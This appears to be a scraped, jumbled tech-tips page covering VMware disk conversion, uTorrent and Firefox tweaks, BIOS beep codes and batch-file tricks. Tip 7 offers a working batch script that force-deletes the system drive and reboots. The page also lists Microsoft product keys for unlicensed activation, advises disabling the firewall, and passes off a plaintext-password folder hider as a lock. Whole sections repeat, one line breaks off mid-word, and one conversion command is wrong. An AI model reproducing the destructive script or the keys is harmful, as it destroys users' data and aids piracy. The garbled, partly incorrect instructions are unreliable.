Note: That is a -t Zero not a capital O. see man vmware-vdiskmanager.
Note: vmware-vdiskmanager is part of vmware server (and workstation, not sure about player).
2. Alternate – Converting “flat files”.
Flat files are used by vmware if you create a virtual disk (vmdk) with the “Allocate all disk space now” option (you have this option when creating disks for use with vmware). Flat files contain all the data from your .vmdk and can (usually) be converted directly.
Notice, flat files can be directly converted to .qcow. If you wish to convert to .vdi (VirtualBox) convert flat to raw.
KVM :
qemu-img convert Ubuntu-flat.vmdk -O qcow2 Ubuntu-copy.qemu
Note: That is a capital O qcow2
RAW (for VirtualBox)
qemu-img convert Ubuntu-copy.vmdk -O qcow2 Ubuntu-copy.qemu
Note: That is a capital O qcow2
3. Boot the image with KVM
kvm -hda Ubuntu-copy.qcow -net nic -net user -m 512
Caveats :
If you have vmware-tools installed, you will have mouse integration.
If you have vmware-tools installed, the guest desktop may well be larger then the kvm window. You will need to resize the guest display to 800×600 .
I could not convert a .vmdk which was using LVM (Fedora).
VirtualBox – Convert to .vdi
1. First use qemu-img to convert the copy .vmdk to raw.
qemu-img convert Ubuntu-copy.vmdk Ubuntu-copy.img
qemu-img with no options will make a raw image. If you prefer you can specify
qemu-img convert Ubuntu-flat.vmdk -O raw Ubuntu-copy.img
2. Then convert the raw image with VBoxManage
VBoxManage convertfromraw – -format VDI Ubuntu-copy.img Ubuntu-copy.vdi
Note: Two – - in front of “format” (Wordpress converts two – - to one long one).
3. Start VirtualBox, make a new machine or add the Ubuntu.vdi to an existing machine.
Caveats :
With VMWare-tools installed, Mouse integration did not work (as it did with KVM).
The resolution of the guest is also larger then the Virtualbox window.
I installed the VirtualBoxAdditions and guest resolution worked well, mouse integration, however, did not.
As always, I hope this helps. Converting usually went smoothly for me however there is the occasional .vmdk I could not convert.
Speed Up utorrent RAPIDLY
uTorrent was very slow for me until recently I applied a few tweaks. Here's what I did.
Note: Some of the settings mentioned below are optimized for 256k connection. If you want to calculate the optimal settings for your connection, check at the end of this tutorial. But I suggest you to read the entire tutorial for guidance on other settings.
First go to Options>Preferences>Network
1. Under 'Port used for incoming connections', enter any port number. It is best to use a port number above 10000. I use 45682.mine 10981
2. Randomize port each time utorrent starts: UNCHECKED. I leave this unchecked because I have a router. If you do not have a router or a firewall, and want extra security, check this option.
3. Enable UPnP port mapping (Windows Xp or later only): UNCHECKED. I leave this unchecked because I have experienced it slowing down speeds. It is not needed if you manually port forward.
4. Add utorrent to Windows Firewall exceptions (Windows XP SP2 or later only): UNCHECKED (do this only if you have windows firewall disabled)
5. Global Maximum upload rate (kb/s): [0: unlimited]: 22 (for 256k connection)
6. Protocol Encryption: ENABLED. I would recommend everyone to enable this. This can help increase speeds with many ISPs.
7. Allow incoming Legacy Connections: CHECKED
Network Settings
Options>Preferences>Torrents
1. Global Maximum Number of Connections: 130 (for 256k connection) This number should not be set too low or the number of connections made to your torrents will be limited. Setting it too high may cause too much bandwidth to be used and can cause slowdowns. For mine 200
2. Maximum Number of connected peers per torrent: 70 (for 256k connection) If you see that the peers connected to a specific torrent are exactly this number, or very close, increase this number to improve speeds.mine 150
3. Number of upload slots per torrent: 3 (for 256k connection) This depends on how much you want to upload to other users. Do not set too low or it may affect download speeds. mine 4
4. Use additional upload slots if upload speed Preferences>Advanced
net.max_halfopen: 50
If you use Windows XP SP2, patch tcpip.sys with LvlLord's Event ID 4226 Patcher to get better performance.
DO NOT CHANGE THIS OPTION unless you have Windows XP SP2 and have patched tcpip.sys.
You can also patch tcpip.sys with xp-Antispy
If you have a firewall
* Open up the options/preferences/settings for the firewall - usually your firewall will have an icon to click in the taskbar
* Look for the keywords "allow list" or "programs"
* Add the application you want to give access to the internet
* Make sure to save your settings when you are done
If you have a router
1. Go to start>run>type cmd, press enter>type ipconfig, press enter
2. Remember both your ip address and your default gateway
3. Type in your default gateway into your default browser, a password prompt may come up. The default username and password are admin for my router
4. Under 'Applications' fill out one line for each p2p client you use
5. You need to use your ip address, the correct port range and set either tcp or udp
6. You can find and change the ports in the actual p2p client's settings, just make sure they are the same in the router
7. Most p2p apps need both tcp and udp checked, if you are not sure check your p2p client's FAQ
8. Save your settings
:!: Check PortForward.com to forward ports for uTorrent.
Some of the settings I mentioned above are relative to my bandwidth.
How to calculate optimal settings for your connection
In order to apply the following tips you need to know your maximum upload and download speeds. You can test your bandwidth over here.
Maximum upload speed
If you use your Maximum upload speed, there won't be not enough space left for the files you are downloading. So you have to cap your upload speed.
This is how I calculate my optimal upload speed…
upload speed * 80%
Maximum download speed
Setting your maximum download speed to unlimited will hurt your connection. So use this to calculate your optimal setting.
download speed * 90%
Maximum connected peers per torrent
upload speed * 1.3
Maximum upload slots
1 + (upload speed / 6)
Disable Windows Firewall
Windows Firewall hates P2P and so disable it and get yourself a decent firewall like Zone Alarm.
And last optimize your Internet connection with TCP Optimizer.
Original Microsoft Product Keys
Here are some original Microsoft keys for its various products.
Microsoft Product Key(Original Key)
Windows Server :
Windows Server 2003 R2 Enterprise Edition -----KX9YP-83MH3-GTFVG-JKCWC-629HG
Windows Server 2003 R2 Standard Edition -----FQFYX-JXQRT-3MJGD-2B8HP-KHC8B
Windows Server Longhorn February 2007 CTP (IA64) -----9JB9R-HV9F2-9TQRG-372M3-DWH6H
Windows Server Longhorn February 2007 CTP (x86 and x64) ----- RGVDW-V3J3C-6CD3P-2CQJV-GF4PG
WINDOWS VISTA :
Windows Vista Business ----------- J9QVT-JJMB9-RVJ38-M8KT6-DMT9M
Windows Vista Home Basic --------- KJTCW-YQGRK-XPQMR-YTQG8-DKVG6
Windows Vista Home Basic N ------- YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT
Windows Vista Home Premium ------ PYYBC-K9XT9-V92KD-6CT89-4VB82
Windows Vista Ultimate ------------ PVVFY-2F78Q-8T7M8-HDQB2-BR3YT
Windows Vista Enterprise ---------- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7
WINDOWS XP :
Windows XP Home Edition K ---------- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W
Windows XP Home Edition KN --------- M9D9J-2TQV2-FBJQP-2M8G8-DGQ26
Windows XP Media Center Edition ----- H23CJ-2WXM9-M9D2K-42226-DJWRD
Windows XP Professional Edition K ---- FRH2X-6VD7F-YH2TV-2V8B7-J46F6
Windows XP Professional Edition KN --- QKBGY-T8JFG-F448Q-24KR9-48XPJ
Windows XP Home Edition ------------ GHGCP-3KFC6-Y4J4D-MVG7V-67TV6
Windows XP Professional ------------- F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ
Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD
Windows XP Professional x64 Edition -- PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW
Windows XP Tablet PC Edition -------- WFMYK-68Y2T-JD473-W8DMW-8PFHQ
WINDOWS 2000 :
Windows 2000 Professional ------------ DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM
Windows 2000 Server (All Versions) ---- KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
MICROSOFT OFFICE + FRONT PAGE :
Office XP Professional with FrontPage - GBJ7J-7MYPV-RJ46R-RQJXJ-WQ2CM
Office Professional 2007 -------------- VMRGQ-G3YMP-RWYH2-4TQ97-CT2HD
Office Ultimate 2007 ----------------- VJPW8-MB6MR-8D8YM-TW37V-WYVX3
Office Professional Plus 2007 --------- VBQJ8-CBP7J-CP4BH-Q9GFW-B8X
Office System Beta 2 2007 ----------- RQCRJ-FCTYM-V3PDF-GRD46-9YHXQ
Outlook 2007 ------------------------ DB4QP-GTFT3-FT3T6-VHHJ9-98XQQ
Office System Groove Server 2007 Beta 2 ----- WCMWF-H7DD9-3R2Q6-QM863-G7XD6
Office System Project Server 2007 Beta 2 ----- CYGH3-KVXBH-JDQV3-FFYPP-XGKD3
Office System SharePoint Server 2007 Beta 2 ----- C39KH-VHBKR-KT62D-Q4FVG-4PB76
FrontPage Professional 2003 ---------- RV3CJ-VCB3D-9PY99-YDKX8-9MG2T
EXCHANGE :
Exchange Server 2007 Enterprise Edition ------ PYYMB-HQQMQ-3TBM2-XJ99F-83XVM
Exchange Server 2007 Standard Edition ------ W3MX6-2WXMD-QB887-4WGPK-VPVDY
Forms Server 2007 -------------------- K76FH-Y2JHK-9BGCR-37KPR-4Y6JQ
Project Portfolio Server 2007 ---------- QRPKT-683CC-MJ9VJ-FHBCC-HYKGD
Project Server 2007 ------------------- GM27X-X6X37-T69MH-98J3Q-44TKG
SHARE POINT :
SharePoint Server 2007 Enterprise Edition --- F6YVR-4XY7K-RCVY4-37FBK-G44PY
SharePoint Server 2007 for Search Enterprise Edition ------ P87VV-Q34RV-GW2HT-JVXWV-3VFPM
SharePoint Server 2007 for Search Standard Edition ------ MYBJH-6YGQQ-6WW3C-FGM3V-YY6JW
SharePoint Server 2007 Standard Edition ------ WFF2P-M8XYH-3B33C-6KPP9-XVQTG
SharePoint Designer 2007 ------------ T9CJK-W68FW-D9FX6-37HG3-XHF7D
ACCESS + GROOVE + INFOPATH E.T.C :
Access 2007 ------------------------- HP44H-VWH8K-J7T22-QD3KC-37F7D
Groove 2007 ------------------------- MCW9C-WTKM4-KRHBQ-CPYJQ-YYD93
Groove Server 2007 ------------------ R4X9H-MP2C6-CV2FX-QGPKY-93RPG
InfoPath 2007 ----------------------- C3R8F-TMMYD-TBGDP-2RDXT-88393
InterConnect 2007 ------------------- P2BJF-HGV87-RRFB7-8DVQR-F23DQ
OneNote 2007 ----------------------- GJ2V8-K8CHV-7QP4V-K23TM-CMQDQ
Project Professional 2007 ------------ T7CBB-KW6DD-VTHB9-6V4D4-K3393
Project Standard 2007 --------------- G2XT7-K47QK-BFVXC-83T9M-8Y63Q
Publisher 2007 ----------------------- VC3PJ-TBV6V-XWG4P-2GRBH-RVWVD
Visio Professional 2007 --------------- JVBKC-PVJRX-MCT9J-JV7FK-JXYK3
Visio Standard 2007 ----------------- VYK2W-K2Q3Y-MRCTC-WRWMY-8JCHD
Tip 4:
How to increase download speeds in firefox
Firefox is configured by default for dial-up speeds. If you have high speed internet access such as DSL or cable, you can change a few settings in Firefox and increase your download speeds. If you change the number of connections that Firefox uses to download, you will see a dramatic increas in your bandwidth. The larger the file you are downloading, the greater the speed will be, because more connections can be made to the server.
1. Change Firefox connection setting by typing "about:config" in the address bar of Firefox.
2. In the "Filter:" bar, type "persistent"
3. You should now see two preference names with their values:
network.http.max-persistent-connections-per-proxy user set interger 4
network.http.max-persistent-connections-per-server user set interger 2
4. Double click on each of the preference names. A window will pop-up allowing you to change the values for each. If you have cable or DSL use a number between 20 and 30!. Click OK.
Tip 5:
Firefox: Extreme Speed !
Once you've loaded up firefox go to the address bar and type or copy and paste:
about:config
Right click and select: New -> Integer
Name the integer or copy paste:
nglayout.initialpaint.delay
Change the integers value to:
300
You can also use 0 (zero) as an Integer Value, if you don't like the performance of the 300 Integer Value.
Enjoy & Watch Your Speed!
Or If Not Try This One Too!
1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere in the "aboug:config" page and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.
4. Restart Firefox
If you're using a broadband connection you'll load pages 2-3 times faster now.
Tip 6:
How to eliminate Firefox popups Once and For All
1. Type about:config into the Firefox location bar.
2. Right-click on the page and select New and then Integer.
3. Name it privacy.popups.disable_from_plugins
4. Set the value to 2.
The possible values are:
* 0: Allow all popups from plugins.
* 1: Allow popups, but limit them to dom.popup_maximum.
* 2: Block popups from plugins.
* 3: Block popups from plugins, even on whitelisted sites.
Tip 7 : Dangerous Tip
Destroy's Computer
Type this command in notepad and save as .bat
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
What it does is ?
you get a blue screen that say's file is missing please intall XP again
Tip 8:
A Trick To Check Ur Antivirus Is Working Properly
Open notepad
Copy this code in the text file....
"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
without qutoes....
then save it with the name fakevirus.exe
If this file got deleted immediately ....that means ur antivirus is working n updated
Tip 9
Bios beep codes!!!
bios beep codes
BIOS Beep Codes (AMI Known as American Megatrends International & Phoenix)
When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
Because there are many brands of BIOS, there are no standard beep codes for every BIOS. The two most-used brands are AMI (American Megatrends International) and Phoenix.
AMI Beep Codes
Beep Code Meaning
1 beep - DRAM refresh failure. There is a problem in the system memory or the motherboard.
2 beeps - Memory parity error. The parity circuit is not working properly.
3 beeps - Base 64K RAM failure. There is a problem with the first 64K of system memory.
4 beeps - System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
5 beeps - Processor failure. The system CPU has failed.
6 beeps - Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
7 beeps - Virtual mode exception error.
8 beeps - Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
9 beeps - ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
10 beeps - CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
11 beeps - Bad cache memory. An error in the level 2 cache memory.
1 long beep, 2 short - Failure in the video system.
1 long beep, 3 short - A failure has been detected in memory above 64K.
1 long beep, 8 short - Display test failure.
Continuous beeping - A problem with the memory or video.
Phoenix Beep Codes
Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.
4-Beep Codes
Beep Code Meaning
1-1-1-3 Faulty CPU/motherboard. Verify real mode.
1-1-2-1 Faulty CPU/motherboard.
1-1-2-3 Faulty motherboard or one of its components.
1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
1-1-3-2 Faulty motherboard or one of its components.
1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
1-1-3-2
1-1-3-3
1-1-3-4 Failure in the first 64K of memory.
1-1-4-1 Level 2 cache error.
1-1-4-3 I/O port error.
1-2-1-1 Power management error.
1-2-1-2
1-2-1-3 Faulty motherboard or one of its components.
1-2-2-1 Keyboard controller failure.
1-2-2-3 BIOS ROM error.
1-2-3-1 System timer error.
1-2-3-3 DMA error.
1-2-4-1 IRQ controller error.
1-3-1-1 DRAM refresh error.
1-3-1-3 A20 gate failure.
1-3-2-1 Faulty motherboard or one of its components.
1-3-3-1 Extended memory error.
1-3-3-3
1-3-4-1
1-3-4-3 Error in first 1MB of system memory.
1-4-1-3
1-4-2-4 CPU error.
1-4-3-1
2-1-4-1 BIOS ROM shadow error.
1-4-3-2
1-4-3-3 Level 2 cache error.
1-4-4-1
1-4-4-2
2-1-1-1 Faulty motherboard or one of its components.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4
2-1-3-2 I/O port failure.
2-1-3-1
2-1-3-3 Video system failure.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4 I/O port failure.
2-1-4-3
2-2-1-1 Video card failure.
2-2-1-3
2-2-2-1
2-2-2-3 Keyboard controller failure.
2-2-3-1 IRQ error.
2-2-4-1 Error in first 1MB of system memory.
2-3-1-1
2-3-3-3 Extended memory failure.
2-3-2-1 Faulty motherboard or one of its components.
2-3-2-3
2-3-3-1 Level 2 cache error.
2-3-4-1
2-3-4-3 Motherboard or video card failure.
2-3-4-1
2-3-4-3
2-4-1-1 Motherboard or video card failure.
2-4-1-3 Faulty motherboard or one of its components.
2-4-2-1 RTC error.
2-4-2-3 Keyboard controller error.
2-4-4-1 IRQ error.
3-1-1-1
3-1-1-3
3-1-2-1
3-1-2-3 I/O port error.
3-1-3-1
3-1-3-3 Faulty motherboard or one of its components.
3-1-4-1
3-2-1-1
3-2-1-2 Floppy drive or hard drive failure.
3-2-1-3 Faulty motherboard or one of its components.
3-2-2-1 Keyboard controller error.
3-2-2-3
3-2-3-1
3-2-4-1 Faulty motherboard or one of its components.
3-2-4-3 IRQ error.
3-3-1-1 RTC error.
3-3-1-3 Key lock error.
3-3-3-3 Faulty motherboard or one of its components.
3-3-3-3
3-3-4-1
3-3-4-3
3-4-1-1
3-4-1-3
3-4-2-1
3-4-2-3
3-4-3-1
3-4-4-1
3-4-4-4 Faulty motherboard or one of its components.
4-1-1-1 Floppy drive or hard drive failure.
4-2-1-1
4-2-1-3
4-2-2-1 IRQ failure.
4-2-2-3
4-2-3-1
4-2-3-3
4-2-4-1 Faulty motherboard or one of its components.
4-2-4-3 Keyboard controller error.
4-3-1-3
4-3-1-4
4-3-2-1
4-3-2-2
4-3-3-1
4-3-4-1
4-3-4-3 Faulty motherboard or one of its components.
4-3-3-2
4-3-3-4 IRQ failure.
4-3-3-3
4-3-4-2 Floppy drive or hard drive failure
3-Beep Codes
Beep Code Meaning
1-1-2 Faulty CPU/motherboard.
1-1-3 Faulty motherboard/CMOS read-write failure.
1-1-4 Faulty BIOS/BIOS ROM checksum error.
1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
1-2-2
1-2-3 Faulty motherboard/DMA failure.
1-3-1 Memory refresh failure.
1-3-2
1-3-3
1-3-4 Failure in the first 64K of memory.
1-4-1 Address line failure.
1-4-2 Parity RAM failure.
1-4-3 Timer failure.
1-4-4 NMI port failure.
2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
3-1-1 Master DMA failure.
3-1-2 Slave DMA failure.
3-1-3
3-1-4 Interrupt controller failure.
3-2-4 Keyboard controller failure.
3-3-1
3-3-2 CMOS error.
3-3-4 Video card failure.
3-4-1 Video card failure.
4-2-1 Timer failure.
4-2-2 CMOS shutdown failure.
4-2-3 Gate A20 failure.
4-2-4 Unexpected interrupt in protected mode.
4-3-1 RAM test failure.
4-3-3 Timer failure.
4-3-4 Time of day clock failure.
4-4-1 Serial port failure.
4-4-2 Parallel port failure.
4-4-3 Math coprocessor
Tip 10 :
Lock any folder without any software
NoTe- Its different from invisble as well hidden folder....here u need to have a password with which u can open your filder
here is the code
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo stuff by satish
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==TYPE UR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Instructions::
1) Copy the give code in a note pad and save the note pad in your pc with the name name.bat (that is with the extension of .bat). you can replace the name portion with anything u want.
NoTe-- In place of password in the code given type your desired password.
2) A batch file will be created where you hav saved. Now double click on it , it will make a folder with the name locker at the same place where the batch file is save.
3) Now add the files you want to be locked in that folder.
4) Double click on the batch file. It will ask for locking the folder formed. Type y(yes). The folder will be locked and hidden.
5) To unlock,double click on batch file again and enter the password in the new window opened.
Tested By Me Working 100%
Tip 11 :
A code to get unlimited downloads from Rapidshare!
Here it is:
1. Copy and paste this code :
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
on your note pad or any other text editor
2. Save the file as : rapidshare.de.bat and leave it on your desktop
3. Every time you download from rapidshare double click on it!
Rip 12 :
Increase your Bandwidth by 20%
Increase your Bandwidth by 20%
Windows uses 20% of your bandwidth! Get it back
A nice little tweak for XP. M*crosoft reserve 20% of your available bandwidth for thei
uTorrent was very slow for me until recently I applied a few tweaks. Here's what I did.
Note: Some of the settings mentioned below are optimized for 256k connection. If you want to calculate the optimal settings for your connection, check at the end of this tutorial. But I suggest you to read the entire tutorial for guidance on other settings.
First go to Options>Preferences>Network
1. Under 'Port used for incoming connections', enter any port number. It is best to use a port number above 10000. I use 45682.mine 10981
2. Randomize port each time utorrent starts: UNCHECKED. I leave this unchecked because I have a router. If you do not have a router or a firewall, and want extra security, check this option.
3. Enable UPnP port mapping (Windows Xp or later only): UNCHECKED. I leave this unchecked because I have experienced it slowing down speeds. It is not needed if you manually port forward.
4. Add utorrent to Windows Firewall exceptions (Windows XP SP2 or later only): UNCHECKED (do this only if you have windows firewall disabled)
5. Global Maximum upload rate (kb/s): [0: unlimited]: 22 (for 256k connection)
6. Protocol Encryption: ENABLED. I would recommend everyone to enable this. This can help increase speeds with many ISPs.
7. Allow incoming Legacy Connections: CHECKED
Network Settings
Options>Preferences>Torrents
1. Global Maximum Number of Connections: 130 (for 256k connection) This number should not be set too low or the number of connections made to your torrents will be limited. Setting it too high may cause too much bandwidth to be used and can cause slowdowns. For mine 200
2. Maximum Number of connected peers per torrent: 70 (for 256k connection) If you see that the peers connected to a specific torrent are exactly this number, or very close, increase this number to improve speeds.mine 150
3. Number of upload slots per torrent: 3 (for 256k connection) This depends on how much you want to upload to other users. Do not set too low or it may affect download speeds. mine 4
4. Use additional upload slots if upload speed Preferences>Advanced
net.max_halfopen: 50
If you use Windows XP SP2, patch tcpip.sys with LvlLord's Event ID 4226 Patcher to get better performance.
DO NOT CHANGE THIS OPTION unless you have Windows XP SP2 and have patched tcpip.sys.
You can also patch tcpip.sys with xp-Antispy
If you have a firewall
* Open up the options/preferences/settings for the firewall - usually your firewall will have an icon to click in the taskbar
* Look for the keywords "allow list" or "programs"
* Add the application you want to give access to the internet
* Make sure to save your settings when you are done
If you have a router
1. Go to start>run>type cmd, press enter>type ipconfig, press enter
2. Remember both your ip address and your default gateway
3. Type in your default gateway into your default browser, a password prompt may come up. The default username and password are admin for my router
4. Under 'Applications' fill out one line for each p2p client you use
5. You need to use your ip address, the correct port range and set either tcp or udp
6. You can find and change the ports in the actual p2p client's settings, just make sure they are the same in the router
7. Most p2p apps need both tcp and udp checked, if you are not sure check your p2p client's FAQ
8. Save your settings
:!: Check PortForward.com to forward ports for uTorrent.
Some of the settings I mentioned above are relative to my bandwidth.
How to calculate optimal settings for your connection
In order to apply the following tips you need to know your maximum upload and download speeds. You can test your bandwidth over here.
Maximum upload speed
If you use your Maximum upload speed, there won't be not enough space left for the files you are downloading. So you have to cap your upload speed.
This is how I calculate my optimal upload speed…
upload speed * 80%
Maximum download speed
Setting your maximum download speed to unlimited will hurt your connection. So use this to calculate your optimal setting.
download speed * 90%
Maximum connected peers per torrent
upload speed * 1.3
Maximum upload slots
1 + (upload speed / 6)
Disable Windows Firewall
Windows Firewall hates P2P and so disable it and get yourself a decent firewall like Zone Alarm.
And last optimize your Internet connection with TCP Optimizer.
Original Microsoft Product Keys
Here are some original Microsoft keys for its various products.
Microsoft Product Key(Original Key)
Windows Server :
Windows Server 2003 R2 Enterprise Edition -----KX9YP-83MH3-GTFVG-JKCWC-629HG
Windows Server 2003 R2 Standard Edition -----FQFYX-JXQRT-3MJGD-2B8HP-KHC8B
Windows Server Longhorn February 2007 CTP (IA64) -----9JB9R-HV9F2-9TQRG-372M3-DWH6H
Windows Server Longhorn February 2007 CTP (x86 and x64) ----- RGVDW-V3J3C-6CD3P-2CQJV-GF4PG
WINDOWS VISTA :
Windows Vista Business ----------- J9QVT-JJMB9-RVJ38-M8KT6-DMT9M
Windows Vista Home Basic --------- KJTCW-YQGRK-XPQMR-YTQG8-DKVG6
Windows Vista Home Basic N ------- YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT
Windows Vista Home Premium ------ PYYBC-K9XT9-V92KD-6CT89-4VB82
Windows Vista Ultimate ------------ PVVFY-2F78Q-8T7M8-HDQB2-BR3YT
Windows Vista Enterprise ---------- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7
WINDOWS XP :
Windows XP Home Edition K ---------- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W
Windows XP Home Edition KN --------- M9D9J-2TQV2-FBJQP-2M8G8-DGQ26
Windows XP Media Center Edition ----- H23CJ-2WXM9-M9D2K-42226-DJWRD
Windows XP Professional Edition K ---- FRH2X-6VD7F-YH2TV-2V8B7-J46F6
Windows XP Professional Edition KN --- QKBGY-T8JFG-F448Q-24KR9-48XPJ
Windows XP Home Edition ------------ GHGCP-3KFC6-Y4J4D-MVG7V-67TV6
Windows XP Professional ------------- F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ
Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD
Windows XP Professional x64 Edition -- PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW
Windows XP Tablet PC Edition -------- WFMYK-68Y2T-JD473-W8DMW-8PFHQ
WINDOWS 2000 :
Windows 2000 Professional ------------ DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM
Windows 2000 Server (All Versions) ---- KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
MICROSOFT OFFICE + FRONT PAGE :
Office XP Professional with FrontPage - GBJ7J-7MYPV-RJ46R-RQJXJ-WQ2CM
Office Professional 2007 -------------- VMRGQ-G3YMP-RWYH2-4TQ97-CT2HD
Office Ultimate 2007 ----------------- VJPW8-MB6MR-8D8YM-TW37V-WYVX3
Office Professional Plus 2007 --------- VBQJ8-CBP7J-CP4BH-Q9GFW-B8X
Office System Beta 2 2007 ----------- RQCRJ-FCTYM-V3PDF-GRD46-9YHXQ
Outlook 2007 ------------------------ DB4QP-GTFT3-FT3T6-VHHJ9-98XQQ
Office System Groove Server 2007 Beta 2 ----- WCMWF-H7DD9-3R2Q6-QM863-G7XD6
Office System Project Server 2007 Beta 2 ----- CYGH3-KVXBH-JDQV3-FFYPP-XGKD3
Office System SharePoint Server 2007 Beta 2 ----- C39KH-VHBKR-KT62D-Q4FVG-4PB76
FrontPage Professional 2003 ---------- RV3CJ-VCB3D-9PY99-YDKX8-9MG2T
EXCHANGE :
Exchange Server 2007 Enterprise Edition ------ PYYMB-HQQMQ-3TBM2-XJ99F-83XVM
Exchange Server 2007 Standard Edition ------ W3MX6-2WXMD-QB887-4WGPK-VPVDY
Forms Server 2007 -------------------- K76FH-Y2JHK-9BGCR-37KPR-4Y6JQ
Project Portfolio Server 2007 ---------- QRPKT-683CC-MJ9VJ-FHBCC-HYKGD
Project Server 2007 ------------------- GM27X-X6X37-T69MH-98J3Q-44TKG
SHARE POINT :
SharePoint Server 2007 Enterprise Edition --- F6YVR-4XY7K-RCVY4-37FBK-G44PY
SharePoint Server 2007 for Search Enterprise Edition ------ P87VV-Q34RV-GW2HT-JVXWV-3VFPM
SharePoint Server 2007 for Search Standard Edition ------ MYBJH-6YGQQ-6WW3C-FGM3V-YY6JW
SharePoint Server 2007 Standard Edition ------ WFF2P-M8XYH-3B33C-6KPP9-XVQTG
SharePoint Designer 2007 ------------ T9CJK-W68FW-D9FX6-37HG3-XHF7D
ACCESS + GROOVE + INFOPATH E.T.C :
Access 2007 ------------------------- HP44H-VWH8K-J7T22-QD3KC-37F7D
Groove 2007 ------------------------- MCW9C-WTKM4-KRHBQ-CPYJQ-YYD93
Groove Server 2007 ------------------ R4X9H-MP2C6-CV2FX-QGPKY-93RPG
InfoPath 2007 ----------------------- C3R8F-TMMYD-TBGDP-2RDXT-88393
InterConnect 2007 ------------------- P2BJF-HGV87-RRFB7-8DVQR-F23DQ
OneNote 2007 ----------------------- GJ2V8-K8CHV-7QP4V-K23TM-CMQDQ
Project Professional 2007 ------------ T7CBB-KW6DD-VTHB9-6V4D4-K3393
Project Standard 2007 --------------- G2XT7-K47QK-BFVXC-83T9M-8Y63Q
Publisher 2007 ----------------------- VC3PJ-TBV6V-XWG4P-2GRBH-RVWVD
Visio Professional 2007 --------------- JVBKC-PVJRX-MCT9J-JV7FK-JXYK3
Visio Standard 2007 ----------------- VYK2W-K2Q3Y-MRCTC-WRWMY-8JCHD
Tip 4:
How to increase download speeds in firefox
Firefox is configured by default for dial-up speeds. If you have high speed internet access such as DSL or cable, you can change a few settings in Firefox and increase your download speeds. If you change the number of connections that Firefox uses to download, you will see a dramatic increas in your bandwidth. The larger the file you are downloading, the greater the speed will be, because more connections can be made to the server.
1. Change Firefox connection setting by typing "about:config" in the address bar of Firefox.
2. In the "Filter:" bar, type "persistent"
3. You should now see two preference names with their values:
network.http.max-persistent-connections-per-proxy user set interger 4
network.http.max-persistent-connections-per-server user set interger 2
4. Double click on each of the preference names. A window will pop-up allowing you to change the values for each. If you have cable or DSL use a number between 20 and 30!. Click OK.
Tip 5:
Firefox: Extreme Speed !
Once you've loaded up firefox go to the address bar and type or copy and paste:
about:config
Right click and select: New -> Integer
Name the integer or copy paste:
nglayout.initialpaint.delay
